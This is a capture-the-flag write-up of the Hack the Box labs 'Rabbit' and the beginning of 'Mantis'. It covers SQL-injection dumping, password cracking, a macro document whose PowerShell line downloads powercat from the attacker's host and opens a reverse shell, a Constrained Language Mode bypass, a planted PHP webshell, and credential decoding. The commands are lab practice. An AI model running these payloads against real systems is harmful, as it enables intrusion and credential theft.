HTB – Rabbit

Today we are going to solve another CTF challenge, “Rabbit”, a retired lab presented by Hack the Box for online penetration-testing practice.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are reachable online they have static IPs. The IP of Rabbit is 10.10.10.71, so let’s start with a basic nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.71
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 15:54 W. Europe Summer Time
Nmap scan report for 10.10.10.71
Host is up (0.032s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:36+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-13 18:55:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:33+00:00; +5h00m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:34+00:00; +5h00m01s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h00m01s, deviation: 0s, median: 5h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.84 seconds

Let’s enumerate the web server on port 8080 (Apache/PHP) with Gobuster:
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.71:8080/
[+] Threads : 20
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded : true
[+] Timeout : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)

Browsing to /complain shows a Complain Management System, so let’s look for known exploits:

root@kali:~/htb/rabbit# searchsploit 'complain management system'
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt 
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec 
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files


## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.

As the advisory says, the hard-coded admin login (admin / admin123) gets us to the vulnerable admin pages; a Customer account can also be registered from the login form. Either way we need the PHPSESSID cookie of an authenticated session and a captured request to the vulnerable function, which we save to a file and hand to sqlmap to read the databases. The request below is the admin-side “Assign Complain” POST; its compId parameter is the injection point.

c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:25] [INFO] cracked password 'barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password |
+----------+--------------------------------------------------+
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/
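As an added example (not part of the original writeup), here is the dictionary attack sqlmap just performed, written out in Python against the dumped secret.users rows. The wordlist is constructed for the example and stands in for sqlmap's wordlist.zip; the store_password/verify_password pair at the end is the hardened form the CMS should have used instead of bare MD5.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample: the secret.users rows exactly as sqlmap dumped them above.
USERS: Dict[str, str] = {
    "Zephon": "13fa8abd10eed98d89fd6fc678afaf94",
    "Kain": "33903fbcc0b1046a09edfaa0a65e8f8c",
    "Dumah": "33da7a40473c1637f1a2e142f4925194",
    "Magnus": "370fc3559c9f0bff80543f2e1151c537",
    "Raziel": "719da165a626b4cf23b626896c213b84",
    "Moebius": "a6f30815a43f38ec6de95b9a9d74da37",
    "Ariel": "b9c2538d92362e0e18e52d0ee9ca0c6f",
    "Turel": "d322dc36451587ea2994c84c9d9717a1",
    "Dimitri": "d459f76a5eeeed0eca8ab4476c144ac4",
    "Malek": "dea56e47f1c62c30b83b70eb281a6c39",
}

# Constructed mini wordlist standing in for sqlmap's wordlist.zip or rockyou.txt.
WORDLIST: List[str] = ["123456", "password", "popcorn", "santiago", "qwerty",
                       "barcelona", "pussycatdolls", "letmein"]

_MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)


def looks_like_md5(digest: str) -> bool:
    """32 hex characters is the shape sqlmap labels 'md5_generic_passwd'."""
    return bool(_MD5_RE.match(digest))


def crack_unsalted(hashes: Dict[str, str], words: Iterable[str]) -> Dict[str, str]:
    """Dictionary attack on unsalted MD5.

    With no per-user salt each candidate word is hashed once and looked up
    against every user, so the cost is O(words + users) rather than
    O(words * users); this is why unsalted storage falls so quickly.
    """
    table = {hashlib.md5(w.encode("utf-8")).hexdigest(): w for w in words}
    return {user: table[d.lower()] for user, d in hashes.items()
            if looks_like_md5(d) and d.lower() in table}


def shared_digests(hashes: Dict[str, str]) -> Dict[str, List[str]]:
    """Equal digests mean equal passwords when there is no salt; cracking one cracks all."""
    groups: Dict[str, List[str]] = {}
    for user, d in hashes.items():
        groups.setdefault(d.lower(), []).append(user)
    return {d: users for d, users in groups.items() if len(users) > 1}


# Hardened form: random per-user salt plus a slow KDF instead of one bare MD5.
PBKDF2_ROUNDS = 600_000


def store_password(password: str) -> Tuple[bytes, bytes]:
    """Return (salt, digest) to persist; the salt is public, the work factor is the defence."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison so the check itself leaks nothing."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    for user, word in crack_unsalted(USERS, WORDLIST).items():
        print(f"{user}: {word}")
```

With a salt, the precomputed table trick in crack_unsalted no longer works: every user would need the whole wordlist hashed again, and the 600,000 PBKDF2 rounds make each of those hashes thousands of times slower than one MD5.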

Exploitation

Where can these credentials be used? Exchange is running on the box, so Outlook Web Access at https://10.10.10.71/owa is the obvious place to try them.

Trying the cracked passwords, Ariel’s is valid:

Ariel:pussycatdolls

Once logged in to /owa, the first thing to do is read the mailbox:

The emails hint that a malicious OpenOffice document sent to the users could get us a shell, but they also mention a PowerShell constraint and Windows Defender, so a stock Metasploit payload is unlikely to survive. Metasploit can still build the document for us:

exploit/multi/misc/openoffice_document_macro

An .odt file is a zip archive: rename the generated file to .zip, open the macro inside it and replace the Metasploit payload with a one-liner that downloads powercat from our host and connects back to us:

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

The constraint is PowerShell’s Constrained Language Mode. It was introduced with PowerShell 3.0 and does not exist in the 2.0 engine, so launching powershell.exe with -version 2 sidesteps it (this only works while the old engine is still installed, as it is on this Windows Server 2008 R2 host):

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Send an email to all, containing our malicious .odt file:

A note on attachments in Outlook Web Access: attaching the file in this OWA version works reliably only from Internet Explorer, not from Edge, Chrome or Firefox.

Now we wait for a user to open the document. This takes roughly 7 minutes; if nothing has connected back after 10, reset the box.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 1234
listening on [any] 1234 ...
10.10.10.71: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.71] 20231: NO_DATA
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

c:\Users\Raziel\Desktop>type user.txt
type user.txt
c6f*****e9c

Post-Exploitation

c:\>dir wamp64
dir wamp64
Volume in drive C has no label.
Volume Serial Number is AEA8-5415

Directory of c:\wamp64

10/28/2017 11:13 AM <DIR> .
10/28/2017 11:13 AM <DIR> ..
10/28/2017 12:19 PM <DIR> alias
10/28/2017 11:13 AM <DIR> apps
12/31/2010 09:39 AM 4,790 barimage.bmp
10/28/2017 11:15 AM <DIR> bin
10/28/2017 11:13 AM <DIR> cgi-bin
01/08/2017 10:13 AM 28,470 images_off.bmp
01/08/2017 10:13 AM 28,470 images_on.bmp
09/01/2017 04:30 PM 3,978 install-english.txt
10/28/2017 11:13 AM <DIR> lang
11/06/2015 11:00 AM 8,156 license-english.txt
10/28/2017 11:18 AM <DIR> logs
09/01/2017 09:44 AM 5,741 mariadb_support_en.txt
09/01/2017 04:20 PM 1,289 read_after_install-english.txt
10/28/2017 11:13 AM <DIR> scripts
05/13/2019 12:44 PM <DIR> tmp
10/28/2017 11:16 AM 4,038,372 unins000.dat
10/28/2017 11:13 AM 1,401,105 unins000.exe
10/28/2017 11:13 AM 185 uninstall_services.bat
10/29/2017 10:32 PM 2,086 wampmanager.conf
09/03/2008 03:46 PM 1,233,408 wampmanager.exe
11/16/2017 07:57 PM 546,316 wampmanager.ini
08/30/2017 09:28 AM 29,431 wampmanager.tpl
05/13/2019 01:56 PM <DIR> www
14 File(s) 7,331,797 bytes
11 Dir(s) 25,699,479,552 bytes free

c:\>

The web service on port 8080 is WampServer (Apache + PHP) installed in c:\wamp64. WAMP’s Apache is installed as a Windows service and often runs as NT AUTHORITY\SYSTEM, so anything we can make Apache execute runs as SYSTEM. Let’s check whether we have write access to the installation and who is running it:

c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>

BUILTIN\Users holds FILE_WRITE_DATA and FILE_APPEND_DATA with container inheritance (the (CI) flag), so any local user can create files and folders anywhere under c:\wamp64, including the web root www. Let’s upload a PHP webshell there:

c:\Python37>type puckie.php
  <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
**** Online ****
0000 ...
002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
  nt authority\system
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=type%20c:\users\administrator\desktop\root.txt
0b2*****d54

The webshell runs as NT AUTHORITY\SYSTEM, confirming that Apache runs as SYSTEM: root.txt can be read directly, and a SYSTEM shell is one more powercat command away. Remove the webshell afterwards, since it is unauthenticated and anyone who reaches port 8080 can use it.

Author: Jacco Straathof

Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/

HTB – Mantis

Today we are going to solve another CTF challenge, “Mantis”, a retired lab presented by Hack the Box for online penetration-testing practice. Its challenges are not easy without some penetration-testing knowledge; let’s start and learn how to find vulnerabilities in a network and exploit them to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are reachable online they have static IPs. The IP of Mantis is 10.10.10.52, so let’s start with nmap port enumeration.

root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after: 2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info: 
| 10.10.10.52:1433: 
| Version: 
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-05-07T13:10:15-04:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2019-05-07 13:10:12
|_ start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds

The scan shows a domain controller for htb.local (DNS, Kerberos, LDAP, SMB), Microsoft SQL Server 2014 Express on port 1433 and an IIS site on port 8080 titled “Tossed Salad - Blog”. Port 1337 is not among the ports nmap scans by default, so it does not appear above; a full scan (nmap -p-) shows it open, serving the default IIS7 page. That page gave no clue for the next step, so I moved on to directory brute forcing.

I used Gobuster with the directory-list-2.3-medium.txt wordlist against http://10.10.10.52:1337:

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.52:1337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)

The result is a directory, /secure_notes.

It contains two files, dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt and web.config; the dev_notes text file is the interesting one, so let’s open it.

Its contents (below) describe the setup: an OrchardCMS site backed by a SQL Server database “orcharddb” with a user “admin”, so what we still need is that user’s password. The file name itself looks suspicious: “NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx” is base64, and the note’s last line says the SQL Server credentials are in the file name, so decoding it should give the password.

root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

The file name dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt carries base64-encoded text:

root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This looks like a hex string. Let’s convert it to ASCII:

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

After decoding the hex we have the SQL Server password for the admin user: m$$ql_S@_P@ssW0rd!. (The OrchardCMS admin credentials line in the same note is encoded more simply, as one 8-bit group per character.)
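As an added example, not part of the original writeup, here is the decoding chain above written out in Python. It goes a little beyond the page: it also decodes the binary “OrchardCMS admin creadentials” line from the note, which the writeup leaves alone, and includes a generic peel() that strips binary, hex and base64 layers in turn while the result stays printable. The order of the checks matters, because a binary string is also valid hex and a hex string is often also valid base64. The constants are copied from the page; the function names are this example's own.

```python
import base64
import binascii
import string
from typing import List, Tuple

# Copied from the /secure_notes listing and the dev_notes file above.
FILENAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"
ADMIN_BITS = "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001"


def token_from_filename(name: str) -> str:
    """Strip the dev_notes_ prefix and every trailing .txt, leaving the encoded token."""
    token = name[len("dev_notes_"):] if name.startswith("dev_notes_") else name
    while token.endswith(".txt"):
        token = token[:-4]
    return token


def decode_b64_hex(token: str) -> str:
    """The two layers on the file name: base64 -> hex text -> ASCII."""
    hex_text = base64.b64decode(token).decode("ascii")
    return binascii.unhexlify(hex_text).decode("ascii")


def decode_bits(bits: str) -> str:
    """One 8-bit group per character, as on the OrchardCMS admin line."""
    bits = "".join(bits.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("expected a multiple of 8 binary digits")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("latin-1")


_PRINTABLE = set(string.printable) - set("\x0b\x0c")


def _is_text(data: bytes) -> bool:
    """True when every byte is printable ASCII; used to decide whether to keep peeling."""
    try:
        return all(ch in _PRINTABLE for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def peel(value: str, max_layers: int = 8) -> Tuple[str, List[str]]:
    """Remove encoding layers (most specific alphabet first) until the text stops decoding."""
    layers: List[str] = []
    for _ in range(max_layers):
        if not value:
            break
        if set(value) <= {"0", "1"} and len(value) % 8 == 0:
            candidate, layer = decode_bits(value).encode("latin-1"), "binary"
        elif set(value) <= set(string.hexdigits) and len(value) % 2 == 0:
            candidate, layer = binascii.unhexlify(value), "hex"
        else:
            try:
                candidate, layer = base64.b64decode(value, validate=True), "base64"
            except (binascii.Error, ValueError):
                break
        if not _is_text(candidate):
            break
        value, layers = candidate.decode("ascii"), layers + [layer]
    return value, layers


def recover_credentials() -> dict:
    """Both secrets from the note, decoded."""
    return {"sql_admin": decode_b64_hex(token_from_filename(FILENAME)),
            "orchard_admin": decode_bits(ADMIN_BITS)}


if __name__ == "__main__":
    for name, secret in recover_credentials().items():
        print(f"{name}: {secret}")
```

peel() stops as soon as a layer produces non-printable bytes, so a real password such as m$$ql_S@_P@ssW0rd! is not mangled by a further base64 attempt; the “$” and “@” fall outside the base64 alphabet and the strict decoder rejects it.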

Using Impacket’s mssqlclient.py we connect to the SQL Server on port 1433 with the user admin and the password just found. Without -windows-auth this is SQL Server authentication, so the htb.local/ prefix plays no role:

root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
